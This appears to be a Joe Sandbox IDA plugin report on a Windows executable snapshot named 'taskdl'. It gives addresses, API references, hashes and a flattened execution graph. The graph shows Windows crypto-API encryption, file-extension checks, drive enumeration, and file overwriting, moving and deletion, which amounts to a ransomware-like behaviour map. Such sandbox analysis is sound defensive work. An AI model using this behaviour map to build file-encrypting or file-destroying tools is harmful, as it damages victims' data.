                                  0x0040156e
                                  0x0040156e
                                  0x00401574
                                  0x00401578
                                  0x00401578
                                  0x0040157c
                                  0x0040157f
                                  0x0040158a
                                  0x0040158c
                                  0x0040158e
                                  0x00401590
                                  0x00401595
                                  0x00401598
                                  0x0040159b
                                  0x0040159b
                                  0x0040159e
                                  0x004015a2
                                  0x004015a2
                                  0x004015a6
                                  0x004015a9
                                  0x004015ad
                                  0x0040167f
                                  0x0040167f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004015b3
                                  0x004015b3
                                  0x004015c0
                                  0x004015c6
                                  0x004015c9
                                  0x004015cd
                                  0x004015d1
                                  0x004015de
                                  0x004015e4
                                  0x004015e4
                                  0x004013f2
                                  0x004013f2
                                  0x004013f7
                                  0x00401404
                                  0x00401404
                                  0x004013f9
                                  0x004013fd
                                  0x00401402
                                  0x00000000
                                  0x00000000
                                  0x00401402
                                  0x00401408
                                  0x00401410
                                  0x0040140a
                                  0x0040140a
                                  0x0040140a
                                  0x00401413
                                  0x00401417
                                  0x0040141b
                                  0x0040141d
                                  0x0040141d
                                  0x0040141f
                                  0x00401422
                                  0x00401423
                                  0x00401428
                                  0x0040142c
                                  0x00401430
                                  0x00401436
                                  0x00401439
                                  0x0040143e
                                  0x00401440
                                  0x00401442
                                  0x00401447
                                  0x0040144b
                                  0x0040144e
                                  0x00401451
                                  0x00401454
                                  0x00401440
                                  0x0040145a
                                  0x0040145c
                                  0x0040145e
                                  0x00401462
                                  0x00401462
                                  0x00401468
                                  0x0040146d
                                  0x00401471
                                  0x00401474
                                  0x00401477
                                  0x00401478
                                  0x00401478
                                  0x00401462
                                  0x0040147e
                                  0x00401487
                                  0x0040148a
                                  0x0040148f
                                  0x00401491
                                  0x00401495
                                  0x0040149b
                                  0x004014a0
                                  0x004014a4
                                  0x004014a7
                                  0x004014aa
                                  0x004014af
                                  0x004014af
                                  0x00401495
                                  0x004014b5
                                  0x004014b8
                                  0x004014bd
                                  0x004014c3
                                  0x004014c9
                                  0x004014cc
                                  0x004014d4
                                  0x004014dd
                                  0x004014e1
                                  0x004014ee
                                  0x004014f1
                                  0x0040150f
                                  0x0040151d
                                  0x00401520
                                  0x00401528
                                  0x004014f3
                                  0x004014f5
                                  0x004014fe
                                  0x00401501
                                  0x00401509
                                  0x00401509
                                  0x004014f1

                                  APIs
                                  • ??2@YAPAXI@Z.MSVCRT ref: 00401423
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?), ref: 004014C3
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,75F55320,00000000,00000000,?,?,00000001,?), ref: 004015C0
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,75F55320,00000000,00000000,?,?,00000001,?), ref: 0040163D
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP60(?,00000000,?,75F55320,00000000,00000000,?,?,00000001,?), ref: 0040166A
                                    • Part of subcall function 00401690: ?_Xran@std@@YAXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016EE
                                    • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,?,?,?,?,?,00401AD1,000000FF,00401609,?,?,75F55320,00000000,00000000,?,?), ref: 004016F6
                                    • Part of subcall function 00401690: ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 0040172D
                                    • Part of subcall function 00401690: ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 0040173A
                                    • Part of subcall function 00401690: ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00401742
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.1609340923.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000007.00000002.1609296708.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609369811.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000007.00000002.1609402468.0000000000404000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_400000_taskdl.jbxd
                                  Similarity
                                  • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$V12@$?assign@?$basic_string@$Split@?$basic_string@$??2@Eos@?$basic_string@Grow@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                  • String ID:
                                  • API String ID: 3154500504-0
                                  • Opcode ID: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                  • Instruction ID: 1a94831c173c9211e28d46cdbba668eac71917d736910117d3345b582314b656
                                  • Opcode Fuzzy Hash: 6636b44b641b77d4c97a97785cbcd8c41d41e59366c3e557b6000251a80c17ff
                                  • Instruction Fuzzy Hash: FA81B472A003109BD710DE18CC8492AB7E5FBC8358F094A3EED49BB391D636EE05CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:10.9%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:18.5%
                                  Total number of Nodes:1584
                                  Total number of Limit Nodes:17
                                  execution_graph 5449 408c40 5450 408d5c 5449->5450 5452 408c97 5449->5452 5451 408c9d _ftol _ftol 5451->5452 5452->5450 5452->5451 5912 401140 #4710 SendMessageA SendMessageA #537 5917 401970 #3092 #6199 #800 5912->5917 5914 401199 SetTimer 5915 4011c3 CreateThread 5914->5915 5916 4011dd 5914->5916 5915->5916 5918 4012d0 5915->5918 5917->5914 5921 4012e0 sprintf sprintf GetFileAttributesA 5918->5921 5922 4013b0 fopen 5921->5922 5923 401350 5921->5923 5925 4012d9 5922->5925 5926 4013ef fread fclose sprintf fopen 5922->5926 5943 404640 InitializeCriticalSection 5923->5943 5926->5925 5928 401471 fread fclose sprintf fopen 5926->5928 5927 401359 5944 4047c0 5927->5944 5928->5925 5929 4014f2 fread fclose 5928->5929 5961 40be90 strncpy strncpy strncpy 5929->5961 5932 401377 5934 401395 DeleteFileA 5932->5934 5935 40137b 5932->5935 5933 401525 5962 40c240 5933->5962 5960 404690 DeleteCriticalSection 5934->5960 6005 404690 DeleteCriticalSection 5935->6005 5939 401575 5939->5925 6004 404640 InitializeCriticalSection 5939->6004 5941 40158c 5942 4047c0 16 API calls 5941->5942 5942->5935 5943->5927 5945 4046b0 CryptAcquireContextA 5944->5945 5947 40484e 5945->5947 5946 4048f3 5946->5932 5947->5946 5948 4049b0 7 API calls 5947->5948 5949 40486e 5948->5949 5950 4048e5 _local_unwind2 5949->5950 5952 4049b0 7 API calls 5949->5952 5950->5946 5953 40488a 5952->5953 5953->5950 5954 404895 CryptEncrypt 5953->5954 5954->5950 5955 404908 CryptDecrypt 5954->5955 5955->5950 5956 404932 strncmp 5955->5956 5957 404984 5956->5957 5958 40495e _local_unwind2 5956->5958 6006 4049a6 5957->6006 5958->5932 5960->5922 5961->5933 5963 40c25f 5962->5963 5964 40bed0 110 API calls 5963->5964 5965 40c29b 5964->5965 5966 40c2a2 5965->5966 5967 40c2c8 5965->5967 5968 40c2bc 5966->5968 5969 40c2ad SendMessageA 5966->5969 5970 40c2e5 5967->5970 5971 40c2d9 SendMessageA 5967->5971 5973 40dbf0 free 5968->5973 5969->5968 5972 40dc00 4 API calls 5970->5972 5971->5970 5974 40c2f8 5972->5974 5999 40c3d8 5973->5999 5975 40dc00 4 API calls 5974->5975 5976 40c313 5975->5976 5977 40dd00 4 API calls 5976->5977 5978 40c324 5977->5978 5979 40dd00 4 API calls 5978->5979 5980 40c335 5979->5980 5981 40dc00 4 API calls 5980->5981 5982 40c350 5981->5982 5983 40dc00 4 API calls 5982->5983 5984 40c36b 5983->5984 5985 40dc00 4 API calls 5984->5985 5986 40c37d 5985->5986 5987 40c3e0 5986->5987 5988 40c3a9 5986->5988 5989 40c3f0 5987->5989 5990 40c3e4 SendMessageA 5987->5990 5991 40c3b9 5988->5991 5992 40c3ad SendMessageA 5988->5992 5993 40c419 5989->5993 5994 40c44d 5989->5994 5990->5989 5995 40dbf0 free 5991->5995 5992->5991 5996 40c429 5993->5996 5997 40c41d SendMessageA 5993->5997 5998 40c49c 5994->5998 6001 40c45e fopen 5994->6001 5995->5999 6003 40dbf0 free 5996->6003 5997->5996 5998->5968 6000 40c4a0 SendMessageA 5998->6000 5999->5939 6000->5968 6001->5998 6002 40c479 fwrite fclose 6001->6002 6002->5998 6003->5999 6004->5941 6005->5925 6007 404770 3 API calls 6006->6007 6008 4049ad 6007->6008 6008->5946 6132 409a40 6136 409d40 6132->6136 6135 409ae7 #2414 #2414 6137 409a87 OffsetRect CreateRectRgn #1641 #5781 6136->6137 6137->6135 6363 409f40 PtVisible 6364 40cf40 6372 40d300 6364->6372 6366 40cf61 6367 40d300 6 API calls 6366->6367 6368 40cf66 6366->6368 6369 40cf87 6367->6369 6370 40d300 6 API calls 6369->6370 6371 40cf8c 6369->6371 6370->6371 6373 40d31f 6372->6373 6374 40d32e 6372->6374 6373->6366 6375 40d339 6374->6375 6376 40d373 time 6374->6376 6378 40d363 6374->6378 6379 40d378 6374->6379 6375->6366 6380 40d493 6376->6380 6381 40d41e 6376->6381 6394 40d2b0 6378->6394 6383 40d3b0 6379->6383 6384 40d380 6379->6384 6385 40d4b1 6380->6385 6390 40d4a8 free 6380->6390 6381->6380 6392 40d487 time 6381->6392 6393 40d469 Sleep 6381->6393 6398 412a90 malloc 6383->6398 6386 40d2b0 memmove 6384->6386 6385->6366 6386->6376 6388 40d3b6 6389 40d3c1 6388->6389 6391 40d2b0 memmove 6388->6391 6389->6366 6390->6385 6391->6376 6392->6380 6392->6381 6393->6381 6395 40d2f5 6394->6395 6396 40d2be 6394->6396 6395->6376 6397 40d2c3 memmove 6396->6397 6397->6395 6397->6397 6398->6388 6141 407650 6142 40765e 6141->6142 6145 407670 6141->6145 6143 4076a0 20 API calls 6142->6143 6146 407665 #2379 6143->6146 6144 407690 #2379 6145->6144 6147 40b620 9 API calls 6145->6147 6148 40768d 6147->6148 6148->6144 5453 404050 #616 5454 404068 5453->5454 5455 40405f #825 5453->5455 5455->5454 6009 404150 6014 404170 #2414 #800 #800 #795 6009->6014 6011 404158 6012 404168 6011->6012 6013 40415f #825 6011->6013 6013->6012 6014->6011 6138 403250 6139 403261 #825 6138->6139 6140 40326a 6138->6140 6139->6140 6149 413254 _exit 6015 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 4642 405a60 4689 40b620 FindWindowW 4642->4689 4646 405aab #2514 4712 403f20 #2414 4646->4712 4648 405ae9 4713 403f20 #2414 4648->4713 4650 405b04 4714 403f20 #2414 4650->4714 4652 405b1f 4715 403f20 #2414 4652->4715 4654 405b3f 4716 403f20 #2414 4654->4716 4656 405b5a 4717 403f20 #2414 4656->4717 4658 405b75 4718 403f20 #2414 4658->4718 4660 405b90 4719 403f20 #2414 4660->4719 4662 405bab 4720 403f20 #2414 4662->4720 4664 405bc6 4721 403f20 #2414 4664->4721 4666 405be1 4722 403f20 #2414 4666->4722 4668 405bfc 4723 403f90 #2414 4668->4723 4670 405c10 4724 403f90 #2414 4670->4724 4672 405c24 #800 #800 #800 #800 #781 4725 4050a0 #800 #795 4672->4725 4674 405c9c 4726 4050a0 #800 #795 4674->4726 4676 405cb0 4727 404170 #2414 #800 #800 #795 4676->4727 4678 405cc4 4728 404170 #2414 #800 #800 #795 4678->4728 4680 405cd8 4729 404170 #2414 #800 #800 #795 4680->4729 4682 405cec 4730 404170 #2414 #800 #800 #795 4682->4730 4684 405d00 4731 405d90 #654 #765 4684->4731 4686 405d14 4732 405d90 #654 #765 4686->4732 4688 405d28 #609 #609 #616 #641 4690 40b634 7 API calls 4689->4690 4691 405a8a #1134 #2621 #6438 4689->4691 4690->4691 4692 40b687 ExitProcess 4690->4692 4693 4060e0 #324 #567 #567 #567 4691->4693 4733 4085c0 7 API calls 4693->4733 4695 406162 4696 4085c0 9 API calls 4695->4696 4697 406172 4696->4697 4737 404090 7 API calls 4697->4737 4699 406182 4738 404090 7 API calls 4699->4738 4701 406192 4739 404090 7 API calls 4701->4739 4703 4061a2 4740 404090 7 API calls 4703->4740 4705 4061b2 4741 405000 #567 #540 4705->4741 4707 4061c2 4708 405000 2 API calls 4707->4708 4709 4061d2 #567 #540 #540 #540 #540 4708->4709 4743 407640 4709->4743 4711 4062cb 7 API calls 4711->4646 4712->4648 4713->4650 4714->4652 4715->4654 4716->4656 4717->4658 4718->4660 4719->4662 4720->4664 4721->4666 4722->4668 4723->4670 4724->4672 4725->4674 4726->4676 4727->4678 4728->4680 4729->4682 4730->4684 4731->4686 4732->4688 4734 408660 #6140 4733->4734 4735 408654 4733->4735 4734->4695 4735->4734 4736 40865a GetSysColor 4735->4736 4736->4734 4737->4699 4738->4701 4739->4703 4740->4705 4742 40504a 4741->4742 4742->4707 4743->4711 4754 40db60 send 5456 403860 SendMessageA 5457 403892 SendMessageA 5456->5457 5458 403883 #1200 5456->5458 5459 4038d1 5457->5459 5460 4038a5 SendMessageA CreateThread 5457->5460 5460->5459 5461 4038e0 5460->5461 5464 4038f0 5461->5464 5463 4038e9 5483 403eb0 6 API calls 5464->5483 5466 403916 SendMessageA 5467 4039e1 5466->5467 5468 403937 SendMessageA 5466->5468 5530 403eb0 6 API calls 5467->5530 5469 403951 5468->5469 5470 403958 5468->5470 5484 403af0 fopen 5469->5484 5501 401e90 5470->5501 5474 4039ea CloseHandle 5474->5463 5475 403961 sprintf 5506 402020 5475->5506 5477 403998 5478 40399c 5477->5478 5515 403a20 5477->5515 5479 4039cd 5478->5479 5481 4039c8 #1200 5478->5481 5523 401f30 5479->5523 5481->5479 5483->5466 5485 403b41 5484->5485 5486 403b28 5484->5486 5487 401e90 InitializeCriticalSection 5485->5487 5486->5470 5488 403b4d 5487->5488 5489 402020 14 API calls 5488->5489 5490 403b67 5489->5490 5491 403b6b 5490->5491 5499 403b9b 5490->5499 5492 401f30 6 API calls 5491->5492 5494 403b82 5492->5494 5493 403c61 fclose 5495 401f30 6 API calls 5493->5495 5494->5470 5497 403c8f 5495->5497 5496 403bb2 fgets 5498 403c5f 5496->5498 5496->5499 5497->5470 5498->5493 5499->5493 5499->5496 5499->5498 5531 402650 MultiByteToWideChar 5499->5531 5623 404640 InitializeCriticalSection 5501->5623 5503 401eb6 5624 404640 InitializeCriticalSection 5503->5624 5505 401ec4 5505->5475 5625 4046f0 5506->5625 5508 402031 5509 402035 5508->5509 5510 402048 GlobalAlloc 5508->5510 5511 4046f0 12 API calls 5508->5511 5509->5477 5512 402061 5510->5512 5513 402066 GlobalAlloc 5510->5513 5511->5510 5512->5477 5514 402079 5513->5514 5514->5477 5516 403a32 GetLogicalDrives 5515->5516 5517 403adc 5515->5517 5521 403a48 5516->5521 5517->5478 5518 403a53 GetDriveTypeW 5519 403a81 GetDiskFreeSpaceExW 5518->5519 5518->5521 5519->5521 5520 403ace 5520->5478 5521->5518 5521->5520 5663 4026b0 5521->5663 5753 401fa0 5523->5753 5525 401f60 5762 404690 DeleteCriticalSection 5525->5762 5527 401f7a 5763 404690 DeleteCriticalSection 5527->5763 5529 401f8a 5529->5467 5530->5474 5534 402560 wcscpy wcsrchr 5531->5534 5533 40269a 5533->5499 5535 4025c9 wcscat 5534->5535 5536 402599 _wcsicmp 5534->5536 5537 4025bd 5535->5537 5536->5537 5538 4025ae _wcsicmp 5536->5538 5547 4020a0 CreateFileW 5537->5547 5538->5535 5538->5537 5540 4025eb 5541 402629 DeleteFileW 5540->5541 5542 4025ef DeleteFileW 5540->5542 5543 402634 5541->5543 5542->5543 5544 4025fa 5542->5544 5543->5533 5545 402617 5544->5545 5546 4025fe MoveFileW 5544->5546 5545->5533 5546->5533 5548 402143 GetFileTime ReadFile 5547->5548 5566 402139 _local_unwind2 5547->5566 5550 40217c 5548->5550 5548->5566 5551 402196 ReadFile 5550->5551 5550->5566 5552 4021b3 5551->5552 5551->5566 5553 4021c3 ReadFile 5552->5553 5552->5566 5554 4021ea ReadFile 5553->5554 5553->5566 5555 402208 ReadFile 5554->5555 5554->5566 5556 402226 5555->5556 5555->5566 5557 402233 CloseHandle CreateFileW 5556->5557 5558 4022f9 CreateFileW 5556->5558 5560 402264 SetFilePointer ReadFile 5557->5560 5557->5566 5559 40232c 5558->5559 5558->5566 5580 404af0 5559->5580 5562 402297 5560->5562 5560->5566 5564 4022a4 SetFilePointer WriteFile 5562->5564 5562->5566 5563 40234d 5565 402372 5563->5565 5569 404af0 4 API calls 5563->5569 5564->5566 5567 4022ce 5564->5567 5565->5566 5585 40a150 5565->5585 5566->5540 5567->5566 5568 4022db SetFilePointer SetEndOfFile 5567->5568 5571 402497 SetFileTime 5568->5571 5569->5565 5572 4024e0 _local_unwind2 5571->5572 5573 4024bc CloseHandle MoveFileW 5571->5573 5572->5540 5573->5572 5575 402477 SetFilePointerEx SetEndOfFile 5575->5571 5576 4023e0 ReadFile 5576->5566 5577 4023a7 5576->5577 5577->5566 5577->5575 5577->5576 5592 40b3c0 5577->5592 5581 404b04 EnterCriticalSection CryptDecrypt 5580->5581 5582 404afc 5580->5582 5583 404b3b LeaveCriticalSection 5581->5583 5584 404b2d LeaveCriticalSection 5581->5584 5582->5563 5583->5563 5584->5563 5586 40a184 5585->5586 5587 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5585->5587 5588 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5586->5588 5589 40a1bd 5586->5589 5587->5586 5588->5589 5590 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5589->5590 5591 40a1f6 5589->5591 5590->5591 5591->5577 5593 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5592->5593 5594 40b3ee 5592->5594 5593->5594 5595 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5594->5595 5603 40b410 5594->5603 5596 40b5ba 5598 40b0c0 4 API calls 5596->5598 5604 402424 WriteFile 5596->5604 5598->5596 5600 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5602 40b4ed 5600->5602 5601 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5601->5596 5602->5596 5602->5601 5602->5604 5611 40adc0 5602->5611 5603->5600 5603->5602 5603->5603 5603->5604 5605 40b0c0 5603->5605 5604->5566 5604->5577 5606 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5605->5606 5607 40b0ee 5605->5607 5606->5607 5610 40b114 5607->5610 5617 40a9d0 5607->5617 5610->5603 5610->5610 5612 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5611->5612 5613 40adee 5611->5613 5612->5613 5614 40ae14 5613->5614 5620 40a610 5613->5620 5614->5602 5618 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5617->5618 5619 40a9ff 5617->5619 5618->5619 5619->5603 5621 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5620->5621 5622 40a63f 5620->5622 5621->5622 5622->5602 5623->5503 5624->5505 5642 4046b0 5625->5642 5627 4046f8 5628 404709 5627->5628 5629 4046fc 5627->5629 5631 404711 CryptImportKey 5628->5631 5632 40473e 5628->5632 5647 404770 5629->5647 5635 404760 5631->5635 5636 404731 5631->5636 5654 4049b0 CreateFileA 5632->5654 5635->5508 5637 404770 3 API calls 5636->5637 5639 404738 5637->5639 5638 40474c 5638->5635 5640 404770 3 API calls 5638->5640 5639->5508 5641 40475a 5640->5641 5641->5508 5643 4046b7 CryptAcquireContextA 5642->5643 5644 4046e0 5643->5644 5645 4046d7 5643->5645 5644->5627 5645->5643 5646 4046dd 5645->5646 5646->5627 5648 404788 5647->5648 5649 40477a CryptDestroyKey 5647->5649 5650 40479d 5648->5650 5651 40478f CryptDestroyKey 5648->5651 5649->5648 5652 404703 5650->5652 5653 4047a4 CryptReleaseContext 5650->5653 5651->5650 5652->5508 5653->5652 5655 404a1b _local_unwind2 5654->5655 5656 404a09 GetFileSize 5654->5656 5655->5638 5656->5655 5657 404a25 5656->5657 5657->5655 5659 404a38 GlobalAlloc 5657->5659 5659->5655 5660 404a49 ReadFile 5659->5660 5660->5655 5661 404a64 CryptImportKey 5660->5661 5661->5655 5662 404a81 _local_unwind2 5661->5662 5662->5638 5664 40c8f0 #823 5663->5664 5665 4026e4 5664->5665 5666 40c8f0 #823 5665->5666 5667 402706 swprintf FindFirstFileW 5666->5667 5668 40274d 5667->5668 5682 4027b4 5667->5682 5702 402e00 5668->5702 5670 40276a #825 5672 402e00 2 API calls 5670->5672 5671 4027d4 wcscmp 5674 40295d FindNextFileW 5671->5674 5675 4027ee wcscmp 5671->5675 5676 4027a0 #825 5672->5676 5673 402978 FindClose 5680 40298d 5673->5680 5684 4029b9 5673->5684 5674->5673 5674->5682 5675->5674 5677 402808 swprintf GetFileAttributesW 5675->5677 5679 402ace 5676->5679 5681 4028b6 wcscmp 5677->5681 5677->5682 5678 4029ef swprintf DeleteFileW swprintf DeleteFileW 5685 402a6a #825 5678->5685 5686 402a4f 5678->5686 5679->5521 5680->5684 5692 402560 59 API calls 5680->5692 5681->5674 5683 4028d0 wcscmp 5681->5683 5682->5671 5682->5673 5682->5674 5695 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5682->5695 5708 402af0 _wcsnicmp 5682->5708 5683->5674 5688 4028e6 wcscmp 5683->5688 5684->5678 5694 4026b0 84 API calls 5684->5694 5690 402a94 5685->5690 5691 402aba #825 5685->5691 5697 402a66 5686->5697 5734 402e90 5686->5734 5688->5674 5693 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5688->5693 5690->5691 5699 402e90 2 API calls 5690->5699 5691->5679 5692->5680 5696 402da0 8 API calls 5693->5696 5694->5684 5730 402da0 #823 5695->5730 5700 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5696->5700 5697->5685 5699->5690 5700->5674 5703 402e7a 5702->5703 5707 402e10 5702->5707 5703->5670 5704 402e4c #825 5705 402e6d 5704->5705 5704->5707 5705->5670 5706 402e40 #825 5706->5704 5707->5704 5707->5706 5709 402b12 wcsstr 5708->5709 5710 402b1f 5708->5710 5709->5710 5711 402b30 _wcsicmp 5710->5711 5712 402be9 _wcsicmp 5710->5712 5713 402b42 5711->5713 5714 402b4d _wcsicmp 5711->5714 5715 402c07 _wcsicmp 5712->5715 5716 402bfc 5712->5716 5713->5682 5719 402b67 _wcsicmp 5714->5719 5720 402b5c 5714->5720 5717 402c21 _wcsicmp 5715->5717 5718 402c16 5715->5718 5716->5682 5717->5682 5718->5682 5721 402b81 _wcsicmp 5719->5721 5722 402b76 5719->5722 5720->5682 5723 402b90 5721->5723 5724 402b9b _wcsicmp 5721->5724 5722->5682 5723->5682 5725 402bb5 wcsstr 5724->5725 5726 402baa 5724->5726 5727 402bc4 5725->5727 5728 402bcf wcsstr 5725->5728 5726->5682 5727->5682 5728->5712 5729 402bde 5728->5729 5729->5682 5731 402dbf 5730->5731 5739 402f10 5731->5739 5733 402de4 5733->5700 5735 402ed0 #825 5734->5735 5736 402eb1 5734->5736 5735->5686 5737 402ec4 #825 5736->5737 5738 402ebd 5736->5738 5737->5735 5738->5735 5740 402f40 5739->5740 5747 403044 5739->5747 5741 402f68 5740->5741 5746 402fdb 5740->5746 5743 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5741->5743 5744 402f6e ?_Xran@std@ 5741->5744 5742 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5742->5747 5748 402f85 5743->5748 5744->5743 5745 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5745->5733 5746->5742 5749 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5746->5749 5747->5733 5748->5745 5750 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5748->5750 5751 403006 5749->5751 5750->5745 5752 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5750->5752 5751->5733 5752->5745 5754 404770 3 API calls 5753->5754 5755 401fac 5754->5755 5756 404770 3 API calls 5755->5756 5757 401fb4 5756->5757 5757->5757 5759 401fe3 5757->5759 5760 401fd0 GlobalFree 5757->5760 5758 40200c 5758->5525 5759->5758 5761 401ff9 GlobalFree 5759->5761 5760->5759 5761->5758 5762->5527 5763->5529 6016 403560 6017 40358c #4376 6016->6017 6018 40356e GetExitCodeThread 6016->6018 6019 403593 6017->6019 6018->6017 6018->6019 6402 409f60 RectVisible 6403 401760 #6453 6404 401791 WaitForSingleObject TerminateThread CloseHandle 6403->6404 6405 4017b8 6403->6405 6404->6405 6406 40193e 6405->6406 6407 4018f6 6405->6407 6408 4017d8 sprintf fopen 6405->6408 6409 401915 6407->6409 6412 401903 rand 6407->6412 6410 401834 8 API calls 6408->6410 6411 4018da #1200 6408->6411 6409->6406 6413 401939 #1200 6409->6413 6410->6406 6411->6406 6412->6409 6413->6406 5764 404070 #693 5765 404088 5764->5765 5766 40407f #825 5764->5766 5766->5765 5767 40a070 DrawTextA 6021 408d70 6022 408e09 GetDeviceCaps 6021->6022 6024 408eb0 6022->6024 6030 408ed8 6022->6030 6025 408eba GetDeviceCaps GetDeviceCaps 6024->6025 6024->6030 6025->6030 6026 4090b6 #2414 6027 408f51 _ftol _ftol 6027->6030 6028 408fca _ftol _ftol _ftol 6029 409024 CreateSolidBrush #1641 6028->6029 6028->6030 6029->6030 6030->6026 6030->6027 6030->6028 6031 409048 FillRect #2414 6030->6031 6032 409083 #2754 6030->6032 6031->6030 6032->6030 6150 404670 6155 404690 DeleteCriticalSection 6150->6155 6152 404678 6153 404688 6152->6153 6154 40467f #825 6152->6154 6154->6153 6155->6152 6414 409b70 #2379 6421 403f70 6426 403f90 #2414 6421->6426 6423 403f78 6424 403f88 6423->6424 6425 403f7f #825 6423->6425 6425->6424 6426->6423 6427 404f70 #4476 6428 404f91 6427->6428 6429 404fc7 #3089 6427->6429 6428->6429 6430 404f9b 6428->6430 6156 403271 #2302 #2302 6157 406a00 #4476 6158 406a23 6157->6158 6160 406a62 6157->6160 6159 406a38 #3089 6158->6159 6158->6160 6159->6160 6161 406a46 #3089 6159->6161 6161->6160 6162 406a54 #3089 6161->6162 6162->6160 6163 401600 6164 4016e5 6163->6164 6165 40161a 6163->6165 6166 4016e9 #537 6164->6166 6170 4016de 6164->6170 6167 40161d 6165->6167 6168 40168f 6165->6168 6186 401970 #3092 #6199 #800 6166->6186 6172 401743 #2385 6167->6172 6175 401628 #537 6167->6175 6176 40165e 6167->6176 6169 401693 #537 6168->6169 6168->6170 6185 401970 #3092 #6199 #800 6169->6185 6170->6172 6174 401701 SendMessageA #2385 6183 401970 #3092 #6199 #800 6175->6183 6176->6170 6179 401663 #537 6176->6179 6177 4016ab SendMessageA #2385 6184 401970 #3092 #6199 #800 6179->6184 6180 401640 #2385 6182 40167b #2385 6183->6180 6184->6182 6185->6177 6186->6174 6431 403f00 6436 403f20 #2414 6431->6436 6433 403f08 6434 403f18 6433->6434 6435 403f0f #825 6433->6435 6435->6434 6436->6433 4758 413102 __set_app_type __p__fmode __p__commode 4759 413171 4758->4759 4760 413185 4759->4760 4761 413179 __setusermatherr 4759->4761 4770 4133b2 _controlfp 4760->4770 4761->4760 4763 41318a _initterm __getmainargs _initterm 4764 4131de GetStartupInfoA 4763->4764 4766 413212 GetModuleHandleA 4764->4766 4771 4133e6 #1576 4766->4771 4769 413236 exit _XcptFilter 4770->4763 4771->4769 5768 403810 WideCharToMultiByte 5771 403e60 SendMessageA #3998 SendMessageA 5768->5771 5770 403845 5771->5770 5772 403410 #4476 5773 403454 #3089 5772->5773 5774 403431 5772->5774 5775 40343b 5773->5775 5774->5773 5774->5775 5776 404410 SetCursor 6033 401110 #2302 6437 404310 6438 404333 6437->6438 6439 40433a #470 #5789 #5875 #6172 6437->6439 6440 4044c0 7 API calls 6438->6440 6441 40438a #5789 #755 6439->6441 6440->6439 6442 401f10 6443 401f30 6 API calls 6442->6443 6444 401f18 6443->6444 6445 401f28 6444->6445 6446 401f1f #825 6444->6446 6446->6445 6193 40ca19 6194 40ca26 6193->6194 6195 40ca28 #823 6193->6195 6194->6195 6038 409920 6043 4098c0 6038->6043 6041 409938 6042 40992f #825 6042->6041 6044 4098f2 #5875 6043->6044 6045 4098fb 6043->6045 6044->6045 6045->6041 6045->6042 5777 40a020 TabbedTextOutA 5778 409c20 #3797 5779 409c40 #6734 5778->5779 5780 409c36 5778->5780 5781 409c5b SendMessageA 5779->5781 5782 409c78 5779->5782 5781->5782 5783 409ce4 5782->5783 5784 409caa 